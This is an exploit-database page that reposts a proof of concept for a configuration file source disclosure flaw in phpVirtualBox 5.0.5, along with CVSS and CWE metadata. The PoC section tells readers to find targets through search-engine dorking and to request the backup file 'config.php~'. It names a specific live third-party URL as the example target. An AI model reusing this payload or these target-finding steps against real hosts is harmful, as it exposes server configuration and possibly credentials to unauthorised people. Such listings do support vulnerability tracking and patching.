Advertisement






php virtual box 5.0.5 Configuration file source code disclosure Vulnerability

CVE Category Price Severity
N/A CWE-200 N/A Medium
Author Risk Exploitation Type Date
Unknown High Remote 2018-09-20
CPE
cpe:cpe:/a:php-virtual-box:5.0.5
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.144 0.96496

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090178

Below is a copy:

php virtual box 5.0.5 Configuration file source code disclosure Vulnerability
====================================================================================================================================
| # Title     : php virtual box 5.0.5 Configuration file source code disclosure Vulnerability                                      |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Vendor    : https://sourceforge.net/projects/phpvirtualbox/                                                                    |
| # Dork      :                                                                                                                    |
====================================================================================================================================


poc :


[+]  Dorking n Google Or Other Search Enggine .

[+]  Use Payload : config.php~

[+]  http://easysoft.ns0.it/phpvirtualbox/config.php~

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.